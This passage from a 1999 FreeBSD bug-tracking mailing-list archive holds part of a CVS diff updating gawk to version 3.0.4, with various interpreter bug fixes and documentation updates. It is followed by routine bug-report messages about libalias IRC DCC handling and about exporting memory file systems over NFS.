lengthes, in case one of the expressions has a + * side effect that changes one of the others. + * See test/nasty.awk. */ strp = strlist; len = 0; while (treep >= treelist) { *strp = force_string(tree_eval(*treep--)); - len += (*strp)->stlen; strp++; } *strp = NULL; + + str_count = strp - strlist; + strp = strlist; + for (i = 0; i < str_count; i++) { + len += (*strp)->stlen; + strp++; + } emalloc(str, char *, len+2, "tree_eval"); str[len] = str[len+1] = '\0'; /* for good measure */ dest = str; @@ -1397,6 +1419,11 @@ * r_get_lhs: * This returns a POINTER to a node pointer. get_lhs(ptr) is the current * value of the var, or where to store the var's new value + * + * For the special variables, don't unref their current value if it's + * the same as the internal copy; perhaps the current one is used in + * a concatenation or some other expression somewhere higher up in the + * call chain. Ouch. */ NODE ** @@ -1409,8 +1436,11 @@ if (assign) *assign = NULL; /* for safety */ - if (ptr->type == Node_param_list) + if (ptr->type == Node_param_list) { + if ((ptr->flags & FUNC) != 0) + fatal("can't use function name `%s' as variable or array", ptr->vname); ptr = stack_ptr[ptr->param_cnt]; + } switch (ptr->type) { case Node_var_array: @@ -1444,26 +1474,32 @@ break; case Node_FNR: - unref(FNR_node->var_value); - FNR_node->var_value = make_number((AWKNUM) FNR); + if (FNR_node->var_value->numbr != FNR) { + unref(FNR_node->var_value); + FNR_node->var_value = make_number((AWKNUM) FNR); + } aptr = &(FNR_node->var_value); if (assign != NULL) *assign = set_FNR; break; case Node_NR: - unref(NR_node->var_value); - NR_node->var_value = make_number((AWKNUM) NR); + if (NR_node->var_value->numbr != NR) { + unref(NR_node->var_value); + NR_node->var_value = make_number((AWKNUM) NR); + } aptr = &(NR_node->var_value); if (assign != NULL) *assign = set_NR; break; case Node_NF: - if (NF == -1) - (void) get_field(HUGE-1, assign); /* parse record */ - unref(NF_node->var_value); - NF_node->var_value = make_number((AWKNUM) NF); + if (NF == -1 || NF_node->var_value->numbr != NF) { + if (NF == -1) + (void) get_field(HUGE-1, assign); /* parse record */ + unref(NF_node->var_value); + NF_node->var_value = make_number((AWKNUM) NF); + } aptr = &(NF_node->var_value); if (assign != NULL) *assign = set_NF; Index: field.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/field.c,v retrieving revision 1.3 diff -u -d -r1.3 field.c --- field.c 1997/10/26 12:14:53 1.3 +++ field.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -24,7 +24,6 @@ */ #include "awk.h" -#include typedef void (* Setfunc) P((long, char *, long, NODE *)); @@ -63,6 +62,9 @@ Regexp *FS_regexp = NULL; static NODE *Null_field = NULL; +/* using_FIELDWIDTHS --- static function, macro to avoid overhead */ +#define using_FIELDWIDTHS() (parse_field == fw_parse_field) + /* init_fields --- set up the fields array to start with */ void @@ -140,7 +142,6 @@ char *ops; register char *cops; long i; - char *f0start, *f0end; assert(NF != -1); @@ -184,15 +185,27 @@ * any fields that still point into it, and have them point * into the new field zero. */ - f0start = fields_arr[0]->stptr; - f0end = fields_arr[0]->stptr + fields_arr[0]->stlen; for (cops = ops, i = 1; i <= NF; i++) { - char *field_data = fields_arr[i]->stptr; + if (fields_arr[i]->stlen > 0) { + NODE *n; + getnode(n); - if (fields_arr[i]->stlen > 0 - && f0start <= field_data && field_data < f0end) - fields_arr[i]->stptr = cops; + if ((fields_arr[i]->flags & FIELD) == 0) { + *n = *Null_field; + n->stlen = fields_arr[i]->stlen; + if ((fields_arr[i]->flags & (NUM|NUMBER)) != 0) { + n->flags |= (fields_arr[i]->flags & (NUM|NUMBER)); + n->numbr = fields_arr[i]->numbr; + } + } else { + *n = *(fields_arr[i]); + n->flags &= ~(MALLOC|TEMP|PERM|STRING); + } + n->stptr = cops; + unref(fields_arr[i]); + fields_arr[i] = n; + } cops += fields_arr[i]->stlen + ofslen; } @@ -751,7 +764,7 @@ arr->type = Node_var_array; assoc_clear(arr); - if (sep->re_flags & FS_DFLT) { + if ((sep->re_flags & FS_DFLT) != 0 && ! using_FIELDWIDTHS()) { parseit = parse_field; fs = force_string(FS_node->var_value); rp = FS_regexp; @@ -851,20 +864,20 @@ if (fields_arr != NULL) (void) get_field(HUGE - 1, 0); - if (save_fs && cmp_nodes(FS_node->var_value, save_fs) == 0 - && save_rs && cmp_nodes(RS_node->var_value, save_rs) == 0) - return; - unref(save_fs); - save_fs = dupnode(FS_node->var_value); - unref(save_rs); - save_rs = dupnode(RS_node->var_value); - resave_fs = TRUE; - buf[0] = '\0'; - default_FS = FALSE; - if (FS_regexp) { - refree(FS_regexp); - FS_regexp = NULL; + if (! (save_fs && cmp_nodes(FS_node->var_value, save_fs) == 0 + && save_rs && cmp_nodes(RS_node->var_value, save_rs) == 0)) { + unref(save_fs); + save_fs = dupnode(FS_node->var_value); + unref(save_rs); + save_rs = dupnode(RS_node->var_value); + resave_fs = TRUE; + if (FS_regexp) { + refree(FS_regexp); + FS_regexp = NULL; + } } + buf[0] = '\0'; + default_FS = FALSE; fs = force_string(FS_node->var_value); if (! do_traditional && fs->stlen == 0) parse_field = null_parse_field; @@ -887,7 +900,7 @@ if (fs->stptr[0] == ' ' && fs->stlen == 1) default_FS = TRUE; else if (fs->stptr[0] != ' ' && fs->stlen == 1) { - if (! IGNORECASE) + if (! IGNORECASE || ! isalpha(fs->stptr[0])) parse_field = sc_parse_field; else if (fs->stptr[0] == '\\') /* yet another special case */ @@ -910,6 +923,5 @@ int using_fieldwidths() { - return parse_field == fw_parse_field; + return using_FIELDWIDTHS(); } - Index: gawkmisc.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/gawkmisc.c,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 gawkmisc.c --- gawkmisc.c 1997/10/14 18:16:56 1.1.1.1 +++ gawkmisc.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991 - 97 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. Index: io.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/io.c,v retrieving revision 1.3 diff -u -d -r1.3 io.c --- io.c 1997/10/26 12:14:53 1.3 +++ io.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1976, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -49,8 +49,6 @@ #define O_ACCMODE (O_RDONLY|O_WRONLY|O_RDWR) #endif -#include - #if ! defined(S_ISREG) && defined(S_IFREG) #define S_ISREG(m) (((m) & S_IFMT) == S_IFREG) #endif @@ -95,20 +93,9 @@ static int pidopen P((IOBUF *iop, const char *name, const char *mode)); static int useropen P((IOBUF *iop, const char *name, const char *mode)); -#if defined (MSDOS) && !defined (__GO32__) +#if defined (HAVE_POPEN_H) #include "popen.h" -#define popen(c, m) os_popen(c, m) -#define pclose(f) os_pclose(f) -#else -#if defined (OS2) /* OS/2, but not family mode */ -#if defined (_MSC_VER) -#define popen(c, m) _popen(c, m) -#define pclose(f) _pclose(f) #endif -#else -extern FILE *popen(); -#endif -#endif static struct redirect *red_head = NULL; static NODE *RS; @@ -125,6 +112,15 @@ static jmp_buf filebuf; /* for do_nextfile() */ +#ifdef VMS +/* File pointers have an extra level of indirection, and there are cases where + `stdin' can be null. That can crash gawk if fileno() is used as-is. */ +static int vmsrtl_fileno P((FILE *)); +static int vmsrtl_fileno(fp) FILE *fp; { return fileno(fp); } +#undef fileno +#define fileno(FP) (((FP) && *(FP)) ? vmsrtl_fileno(FP) : -1) +#endif /* VMS */ + /* do_nextfile --- implement gawk "nextfile" extension */ void @@ -487,9 +483,10 @@ /* too many files open -- close one and try again */ if (errno == EMFILE || errno == ENFILE) close_one(); -#ifdef HAVE_MMAP +#if defined __MINGW32__ || defined HAVE_MMAP /* this works for solaris 2.5, not sunos */ - else if (errno == 0) /* HACK! */ + /* it is also needed for MINGW32 */ + else if (errno == 0) /* HACK! */ close_one(); #endif else { @@ -573,24 +570,22 @@ tmp = force_string(tree_eval(tree->subnode)); - /* icky special case: close(FILENAME) called. */ - if (tree->subnode == FILENAME_node - || (tmp->stlen == FILENAME_node->var_value->stlen - && STREQN(tmp->stptr, FILENAME_node->var_value->stptr, tmp->stlen))) { - (void) nextfile(TRUE); - free_temp(tmp); - return tmp_number((AWKNUM) 0.0); - } - for (rp = red_head; rp != NULL; rp = rp->next) { if (strlen(rp->value) == tmp->stlen && STREQN(rp->value, tmp->stptr, tmp->stlen)) break; } + if (rp == NULL) { /* no match */ - if (do_lint) + /* icky special case: close(FILENAME) called. */ + if (tree->subnode == FILENAME_node + || (tmp->stlen == FILENAME_node->var_value->stlen + && STREQN(tmp->stptr, FILENAME_node->var_value->stptr, tmp->stlen))) { + (void) nextfile(TRUE); + } else if (do_lint) warning("close: `%.*s' is not an open file or pipe", tmp->stlen, tmp->stptr); + free_temp(tmp); return tmp_number((AWKNUM) 0.0); } @@ -888,11 +883,11 @@ int i; if (name[6] == 'g') - sprintf(tbuf, "%d\n", getpgrp(getpgrp_arg())); + sprintf(tbuf, "%d\n", (int) getpgrp(getpgrp_arg())); else if (name[6] == 'i') - sprintf(tbuf, "%d\n", getpid()); + sprintf(tbuf, "%d\n", (int) getpid()); else - sprintf(tbuf, "%d\n", getppid()); + sprintf(tbuf, "%d\n", (int) getppid()); i = strlen(tbuf); spec_setup(iop, i, TRUE); strcpy(iop->buf, tbuf); @@ -923,7 +918,7 @@ int ngroups; #endif - sprintf(tbuf, "%d %d %d %d", getuid(), geteuid(), getgid(), getegid()); + sprintf(tbuf, "%d %d %d %d", (int) getuid(), (int) geteuid(), (int) getgid(), (int) getegid()); cp = tbuf + strlen(tbuf); #if defined(NGROUPS_MAX) && NGROUPS_MAX > 0 @@ -1008,7 +1003,7 @@ if (openfd == INVALID_HANDLE) openfd = open(name, flag, 0666); if (openfd != INVALID_HANDLE && fstat(openfd, &buf) > 0) - if ((buf.st_mode & S_IFMT) == S_IFDIR) + if (S_ISDIR(buf.st_mode)) fatal("file `%s' is a directory", name); return iop_alloc(openfd, name, iop); } @@ -1120,7 +1115,7 @@ * except if popen() provides real pipes too */ -#if defined(VMS) || defined(OS2) || defined (MSDOS) +#if defined(VMS) || defined(OS2) || defined (MSDOS) || defined(WIN32) /* gawk_popen --- open an IOBUF on a child process */ @@ -1135,7 +1130,7 @@ return NULL; rp->iop = iop_alloc(fileno(current), cmd, NULL); if (rp->iop == NULL) { - (void) fclose(current); + (void) pclose(current); current = NULL; } rp->ifp = current; @@ -1434,7 +1429,12 @@ iop->name = name; iop->getrec = get_a_record; #ifdef HAVE_MMAP - if (S_ISREG(sbuf.st_mode) && sbuf.st_size > 0) { + /* Use mmap only for regular files with positive sizes. + The size must fit into size_t, so that mmap works correctly. + Also, it must fit into int, so that iop->cnt won't overflow. */ + if (S_ISREG(sbuf.st_mode) && sbuf.st_size > 0 + && sbuf.st_size == (size_t) sbuf.st_size + && sbuf.st_size == (int) sbuf.st_size) { register char *cp; iop->buf = iop->off = mmap((caddr_t) 0, sbuf.st_size, @@ -1535,7 +1535,7 @@ return EOF; } - if (grRS == FALSE) /* special case: RS == "" */ + if (RS_is_null) /* special case: RS == "" */ rs = '\n'; else rs = (char) grRS; @@ -1648,7 +1648,7 @@ */ if (! do_traditional && RSre != NULL) /* regexp */ rsre = RSre; - else if (grRS == FALSE) /* RS = "" */ + else if (RS_is_null) /* RS = "" */ rsre = RS_null_re; else rsre = NULL; @@ -1675,6 +1675,21 @@ /* cases 1 and 2 are simple, just keep going */ if (research(rsre, start, 0, iop->end - start, TRUE) == -1 || RESTART(rsre, start) == REEND(rsre, start)) { + /* + * Leading newlines at the beginning of the file + * should be ignored. Whew! + */ + if (RS_is_null && *start == '\n') { + /* + * have to catch the case of a + * single newline at the front of + * the record, which the regex + * doesn't. gurr. + */ + while (*start == '\n' && start < iop->end) + start++; + goto again; + } bp = iop->end; continue; } @@ -1690,8 +1705,10 @@ /* * Leading newlines at the beginning of the file * should be ignored. Whew! + * + * Is this code ever executed? */ - if (grRS == FALSE && RESTART(rsre, start) == 0) { + if (RS_is_null && RESTART(rsre, start) == 0) { start += REEND(rsre, start); goto again; } @@ -1737,7 +1754,7 @@ bstart = bp; } *bp = '\0'; - } else if (grRS == FALSE && iop->cnt == EOF) { + } else if (RS_is_null && iop->cnt == EOF) { /* * special case, delete trailing newlines, * should never be more than one. @@ -1811,7 +1828,7 @@ return EOF; } - if (grRS == FALSE) /* special case: RS == "" */ + if (RS_is_null) /* special case: RS == "" */ rs = '\n'; else rs = (char) grRS; @@ -1821,7 +1838,7 @@ rs = casetable[rs]; /* if RS = "", skip leading newlines at the front of the file */ - if (grRS == FALSE && iop->off == iop->buf) { + if (RS_is_null && iop->off == iop->buf) { for (bp = iop->off; *bp == '\n'; bp++) continue; @@ -1835,7 +1852,7 @@ */ if (! do_traditional && RSre != NULL) /* regexp */ rsre = RSre; - else if (grRS == FALSE) /* RS = "" */ + else if (RS_is_null) /* RS = "" */ rsre = RS_null_re; else rsre = NULL; @@ -1862,7 +1879,7 @@ iop->off = iop->end; /* all done with the record */ set_RT_to_null(); /* special case, don't allow trailing newlines */ - if (grRS == FALSE && *(iop->end - 1) == '\n') + if (RS_is_null && *(iop->end - 1) == '\n') return iop->end - start - 1; else return iop->end - start; Index: main.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/main.c,v retrieving revision 1.3 diff -u -d -r1.3 main.c --- main.c 1997/10/26 12:14:54 1.3 +++ main.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -439,8 +439,8 @@ fputs("\t-W traditional\t\t--traditional\n", fp); fputs("\t-W usage\t\t--usage\n", fp); fputs("\t-W version\t\t--version\n", fp); - fputs("\nReport bugs to bug-gnu-utils@prep.ai.mit.edu,\n", fp); - fputs("with a Cc: to arnold@gnu.ai.mit.edu\n", fp); + fputs("\nReport bugs to bug-gnu-utils@gnu.org,\n", fp); + fputs("with a Cc: to arnold@gnu.org\n", fp); exit(exitval); } @@ -450,7 +450,7 @@ copyleft() { static char blurb_part1[] = -"Copyright (C) 1989, 1991-1997 Free Software Foundation.\n\ +"Copyright (C) 1989, 1991-1999 Free Software Foundation.\n\ \n\ This program is free software; you can redistribute it and/or modify\n\ it under the terms of the GNU General Public License as published by\n\ Index: msg.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/msg.c,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 msg.c --- msg.c 1997/10/14 18:16:54 1.1.1.1 +++ msg.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. Index: node.c =================================================================== RCS file: /home/ncvs/src/contrib/awk/node.c,v retrieving revision 1.3 diff -u -d -r1.3 node.c --- node.c 1997/10/26 12:14:54 1.3 +++ node.c 1999/09/08 16:32:51 @@ -3,7 +3,7 @@ */ /* - * Copyright (C) 1986, 1988, 1989, 1991-1997 the Free Software Foundation, Inc. + * Copyright (C) 1986, 1988, 1989, 1991-1999 the Free Software Foundation, Inc. * * This file is part of GAWK, the GNU implementation of the * AWK Programming Language. @@ -36,6 +36,7 @@ char save; char *ptr; unsigned int newflags; + extern double strtod(); #ifdef DEBUG if (n == NULL) @@ -140,7 +141,16 @@ /* not an integral value, or out of range */ if ((val = double_to_int(s->numbr)) != s->numbr || val < LONG_MIN || val > LONG_MAX) { -#ifdef GFMT_WORKAROUND + /* + * Once upon a time, if GFMT_WORKAROUND wasn't defined, + * we just blindly did this: + * sprintf(sp, format, s->numbr); + * s->stlen = strlen(sp); + * s->stfmt = (char) index; + * but that's no good if, e.g., OFMT is %s. So we punt, + * and just always format the value ourselves. + */ + NODE *dummy, *r; unsigned short oflags; extern NODE *format_tree P((const char *, int, NODE *)); @@ -161,15 +171,6 @@ freenode(dummy); /* to keep s->stptr == r->stpr. */ goto no_malloc; -#else - /* - * no need for a "replacement" formatting by gawk, - * just use sprintf - */ - sprintf(sp, format, s->numbr); - s->stlen = strlen(sp); - s->stfmt = (char) index; -#endif /* GFMT_WORKAROUND */ } else { /* integral value */ /* force conversion to long only once */ @@ -183,11 +184,9 @@ } s->stfmt = -1; } - emalloc(s->stptr, char *, s->stlen + 2, "force_string"); + emalloc(s->stptr, char *, s->stlen + 2, "format_val"); memcpy(s->stptr, sp, s->stlen+1); -#ifdef GFMT_WORKAROUND no_malloc: -#endif /* GFMT_WORKAROUND */ s->stref = 1; s->flags |= STR; return s; @@ -495,7 +494,9 @@ } i = 0; for (;;) { - if (ISXDIGIT((c = *(*string_ptr)++))) { + /* do outside test to avoid multiple side effects */ + c = *(*string_ptr)++; + if (ISXDIGIT(c)) { i *= 16; if (ISDIGIT(c)) i += c - '0'; Index: patchlevel.h =================================================================== RCS file: /home/ncvs/src/contrib/awk/patchlevel.h,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 patchlevel.h --- patchlevel.h 1997/10/14 18:16:54 1.1.1.1 +++ patchlevel.h 1999/09/08 16:32:51 @@ -1 +1 @@ -#define PATCHLEVEL 3 +#define PATCHLEVEL 4 Index: README_d/README.FIRST =================================================================== RCS file: /home/ncvs/src/contrib/awk/README_d/README.FIRST,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 README.FIRST --- README.FIRST 1997/10/14 18:17:01 1.1.1.1 +++ README.FIRST 1999/09/08 16:32:51 @@ -18,4 +18,4 @@ file, I will yell at you. Arnold Robbins -arnold@gnu.ai.mit.edu +arnold@gnu.org Index: doc/ChangeLog =================================================================== RCS file: /home/ncvs/src/contrib/awk/doc/ChangeLog,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 ChangeLog --- ChangeLog 1997/10/14 18:17:11 1.1.1.1 +++ ChangeLog 1999/09/08 16:32:51 @@ -1,3 +1,30 @@ +Wed Jun 30 16:14:36 1999 Arnold D. Robbins + + * Release 3.0.4: Release tar file made. This time for sure. + +Wed Oct 7 21:59:33 1998 Arnold D. Robbins + + * texinfo.tex: Updated to version 2.227, from Texinfo 3.12. + +Sun Oct 19 12:26:08 1997 Arnold D. Robbins + + * ALL: change references to arnold@gnu.ai.mit.edu to arnold@gnu.org. + +Tue Sep 23 10:31:17 1997 Arnold D. Robbins + + * texinfo.tex: Updated to version 2.218, from Texinfo 3.11. + +Fri Jul 4 08:19:00 1997 Arnold D. Robbins + + * Makefile.in ($(infodir)/gawk.info): Don't make dependent upon + gawk.info, in case installed one is newer. Instead, check that + an installed gawk.info exists and is identical to current one. + If so, just exit; otherwise do the install. + +Wed Jul 2 14:55:12 1997 Arnold D. Robbins + + * Makefile.in ($(infodir)/gawk.info): typo fix. + Thu May 15 12:49:08 1997 Arnold D. Robbins * Release 3.0.3: Release tar file made. Index: doc/awk.1 =================================================================== RCS file: /home/ncvs/src/contrib/awk/doc/awk.1,v retrieving revision 1.4 diff -u -d -r1.4 awk.1 --- awk.1 1999/04/10 20:42:06 1.4 +++ awk.1 1999/09/08 16:32:51 @@ -1,7 +1,7 @@ .ds PX \s-1POSIX\s+1 .ds UX \s-1UNIX\s+1 .ds AN \s-1ANSI\s+1 -.TH GAWK 1 "Dec 19 1996" "Free Software Foundation" "Utility Commands" +.TH GAWK 1 "Apr 28 1999" "Free Software Foundation" "Utility Commands" .SH NAME gawk \- pattern scanning and processing language .SH SYNOPSIS @@ -2150,6 +2150,12 @@ Function parameters used as local variables are initialized to the null string and the number zero upon function invocation. .PP +Use +.BI return " expr" +to return a value from a function. The return value is undefined if no +value is provided, or if the function returns by ``falling off'' the +end. +.PP If .B \-\^\-lint has been provided, @@ -2535,7 +2541,7 @@ .SH VERSION INFORMATION This man page documents .IR gawk , -version 3.0.2. +version 3.0.4. .SH AUTHORS The original version of \*(UX .I awk @@ -2566,10 +2572,10 @@ If you find a bug in .IR gawk , please send electronic mail to -.BR bug-gnu-utils@prep.ai.mit.edu , +.BR bug-gnu-utils@gnu.org , .I with a carbon copy to -.BR arnold@gnu.ai.mit.edu . +.BR arnold@gnu.org . Please include your operating system and its revision, the version of .IR gawk , what C compiler you used to compile it, and a test program @@ -2598,7 +2604,7 @@ provided valuable assistance during testing and debugging. We thank him. .SH COPYING PERMISSIONS -Copyright \(co\) 1996 Free Software Foundation, Inc. +Copyright \(co\) 1996,97,98,99 Free Software Foundation, Inc. .PP Permission is granted to make and distribute verbatim copies of this manual page provided the copyright notice and this permission Index: posix/ChangeLog =================================================================== RCS file: /home/ncvs/src/contrib/awk/posix/ChangeLog,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 ChangeLog --- ChangeLog 1997/10/14 18:17:01 1.1.1.1 +++ ChangeLog 1999/09/08 16:32:51 @@ -1,3 +1,7 @@ +Wed Jun 30 16:14:36 1999 Arnold D. Robbins + + * Release 3.0.4: Release tar file made. This time for sure. + Thu May 15 12:49:08 1997 Arnold D. Robbins * Release 3.0.3: Release tar file made. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 10: 1:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D64F14E86; Wed, 8 Sep 1999 10:01:49 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA94740; Wed, 8 Sep 1999 09:59:43 -0700 (PDT) (envelope-from ru@FreeBSD.org) Date: Wed, 8 Sep 1999 09:59:43 -0700 (PDT) From: Message-Id: <199909081659.JAA94740@freefall.freebsd.org> To: joelh@gnu.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/7669: libalias does not IRC DCC packets under certain conditions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: libalias does not IRC DCC packets under certain conditions State-Changed-From-To: open->suspended State-Changed-By: ru State-Changed-When: Wed Sep 8 09:59:03 PDT 1999 State-Changed-Why: Awaiting IRC guru. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 13:10:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E9378150C3 for ; Wed, 8 Sep 1999 13:10:31 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA10640; Wed, 8 Sep 1999 13:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 01B4414C4B; Wed, 8 Sep 1999 13:07:41 -0700 (PDT) Message-Id: <19990908200741.01B4414C4B@hub.freebsd.org> Date: Wed, 8 Sep 1999 13:07:41 -0700 (PDT) From: mdudley@execonn.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/13642: mfs incompatible with nfs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13642 >Category: i386 >Synopsis: mfs incompatible with nfs >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 13:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Marshall Dudley >Release: 3-2 release >Organization: Teknosurf >Environment: FreeBSD ads28 3.2-RELEASE FreeBSD 3.2-RELEASE #1: Tue Sep 7 12:51:21 PDT 1999 tech@ads28:/usr/src/sys/compile/ADS28 i386 >Description: After succesfully installing an MFS (memory file sytem or ram disk) on a server I then proceeded to mount it through NFS. It acts like a successfull nfs mount but when trying to acces it gives me the following error: "Input/output error" >How-To-Repeat: Totally repeatable, no way to avoid I can find. >Fix: Unknown, badly needed. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 14:43: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 123C114C9E; Wed, 8 Sep 1999 14:43:03 -0700 (PDT) (envelope-from mdodd@FreeBSD.org) Received: (from mdodd@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA18183; Wed, 8 Sep 1999 14:42:57 -0700 (PDT) (envelope-from mdodd@FreeBSD.org) Date: Wed, 8 Sep 1999 14:42:57 -0700 (PDT) From: Message-Id: <199909082142.OAA18183@freefall.freebsd.org> To: mdudley@execonn.com, mdodd@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/13642: mfs incompatible with nfs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mfs incompatible with nfs State-Changed-From-To: open->closed State-Changed-By: mdodd State-Changed-When: Wed Sep 8 14:41:33 PDT 1999 State-Changed-Why: User has observed the expected behavior. Use: options EXPORTMFS in kernel config file and recompile to allow MFS filesystems to be exported via NFS. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 14:50:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 956FD1578E for ; Wed, 8 Sep 1999 14:50:38 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA18788; Wed, 8 Sep 1999 14:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 8 Sep 1999 14:50:02 -0700 (PDT) Message-Id: <199909082150.OAA18788@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Matthew N. Dodd" Subject: Re: i386/13642: mfs incompatible with nfs Reply-To: "Matthew N. Dodd" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/13642; it has been noted by GNATS. From: "Matthew N. Dodd" To: mdudley@execonn.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/13642: mfs incompatible with nfs Date: Wed, 8 Sep 1999 17:40:41 -0400 (EDT) From sys/i386/conf/LINT # Allows MFS filesystems to be exported via nfs options EXPORTMFS On Wed, 8 Sep 1999 mdudley@execonn.com wrote: > > >Number: 13642 > >Category: i386 > >Synopsis: mfs incompatible with nfs > >Confidential: no > >Severity: non-critical > >Priority: medium > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Wed Sep 8 13:10:00 PDT 1999 > >Closed-Date: > >Last-Modified: > >Originator: Marshall Dudley > >Release: 3-2 release > >Organization: > Teknosurf > >Environment: > FreeBSD ads28 3.2-RELEASE FreeBSD 3.2-RELEASE #1: Tue Sep 7 12:51:21 PDT 1999 tech@ads28:/usr/src/sys/compile/ADS28 i386 > >Description: > After succesfully installing an MFS (memory file sytem or ram disk) on > a server I then proceeded to mount it through NFS. It acts like a > successfull nfs mount but when trying to acces it gives me the > following error: > "Input/output error" > >How-To-Repeat: > Totally repeatable, no way to avoid I can find. > >Fix: > Unknown, badly needed. > > >Release-Note: > >Audit-Trail: > >Unformatted: > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message > -- | Matthew N. Dodd | '78 Datsun 280Z | '75 Volvo 164E | FreeBSD/NetBSD | | winter@jurai.net | 2 x '84 Volvo 245DL | ix86,sparc,pmax | | http://www.jurai.net/~winter | This Space For Rent | ISO8802.5 4ever | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 15:50:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 76FA71573B for ; Wed, 8 Sep 1999 15:50:31 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA25014; Wed, 8 Sep 1999 15:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from misha.cisco.com (misha.cisco.com [171.69.206.50]) by hub.freebsd.org (Postfix) with ESMTP id 45E1E15BF3 for ; Wed, 8 Sep 1999 15:46:02 -0700 (PDT) (envelope-from mi@misha.cisco.com) Received: (from mi@localhost) by misha.cisco.com (8.9.3/8.9.1) id SAA11837; Wed, 8 Sep 1999 18:45:58 -0400 (EDT) (envelope-from mi) Message-Id: 